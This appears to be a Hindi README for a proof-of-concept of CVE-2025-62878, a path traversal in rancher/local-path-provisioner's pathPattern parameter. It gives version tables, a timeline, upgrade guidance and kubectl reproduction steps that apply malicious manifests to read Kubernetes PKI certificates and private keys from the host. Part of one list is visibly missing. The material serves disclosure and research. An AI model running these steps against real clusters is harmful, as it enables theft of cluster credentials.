
CVE-2025-62878
| आइटम | मान |
|---|---|
| CVE ID | CVE-2025-62878 |
| GHSA ID | GHSA-jr3w-9vfr-c746 |
| गंभीरता | गंभीर (CVSS 10.0) |
| CWE | CWE-23 (सापेक्ष पथ ट्रैवर्सल) |
| प्रभावित घटक | rancher/local-path-provisioner |
| प्रभावित संस्करण | v0.0.27 ~ v0.0.32 |
| स्थिर संस्करण | v0.0.33+ |
StorageClass के pathPattern पैरामीटर में एक पथ ट्रैवर्सल कमज़ोरी मौजूद है। एक दुर्भावनापूर्ण उपयोगकर्ता सापेक्ष पथ तत्वों (जैसे, ../) का उपयोग करके pathPattern में हेरफेर कर सकता है, जिससे होस्ट नोड पर मनमाने स्थानों को इंगित करने वाले PersistentVolumes बनाए जा सकते हैं, और कॉन्फ़िगर किए गए बेस डायरेक्टरी प्रतिबंध को दरकिनार किया जा सकता है।
यह हमलावरों को अनुमति देता है:
/etc/kubernetes/pki/)| संस्करण | रिलीज़ तिथि | pathPattern समर्थन | कमज़ोर |
|---|---|---|---|
| v0.0.26 | 2023-12-03 | नहीं | सुरक्षित (सुविधा मौजूद नहीं) |
| v0.0.27 | 2024-05-29 | हाँ | कमज़ोर |
| v0.0.28 | 2024-06-19 | हाँ | कमज़ोर |
| v0.0.29 | 2024-09-03 | हाँ | कमज़ोर |
| v0.0.30 | 2024-10-07 | हाँ | कमज़ोर |
| v0.0.31 | 2025-01-24 | हाँ | कमज़ोर |
| v0.0.32 | 2025-07-31 | हाँ | कमज़ोर |
| v0.0.33 | 2025-12-25 | हाँ | स्थिर |
| v0.0.34 | 2026-01-06 | हाँ | स्थिर |
नोट: आधिकारिक GitHub Advisory में कहा गया है कि "< 0.0.34" प्रभावित है, लेकिन हमारे परीक्षण पुष्टि करते हैं:
| घटना | तारीख |
|---|---|
| pathPattern सुविधा शुरू की गई | 2024-05-26 (कमिट af85381) |
| पहला कमज़ोर रिलीज़ (v0.0.27) | 2024-05-29 |
| फिक्स कमिट | 2025-12-24 (कमिट 1ed6b54) |
| पहला पैच किया गया रिलीज़ (v0.0.33) | 2025-12-25 |
| CVE प्रकाशित | 2026-02-04 |
विस्तृत पुनरुत्पादन चरणों और स्क्रिप्ट के लिए exploit/ निर्देशिका देखें।
# 1. कमज़ोर संस्करण स्थापित करें
kubectl apply -f https://raw.githubusercontent.com/rancher/local-path-provisioner/v0.0.30/deploy/local-path-storage.yaml
# 2. एक्सप्लॉइट लागू करें
kubectl apply -f exploit/malicious-storageclass.yaml
kubectl apply -f exploit/malicious-pvc.yaml
kubectl apply -f exploit/exploit-pod.yaml
# 3. शोषण सत्यापित करें
kubectl get pv -o jsonpath='{.items[0].spec.hostPath.path}'
# आउटपुट: /etc/kubernetes/pki
kubectl exec pki-exploit-pod -- ls -la /stolen-pki/
# Kubernetes PKI प्रमाणपत्र और निजी कुंजियाँ दिखाता है
v0.0.33 या बाद के संस्करण में अपग्रेड करें:
kubectl apply -f https://raw.githubusercontent.com/rancher/local-path-provisioner/v0.0.33/deploy/local-path-storage.yaml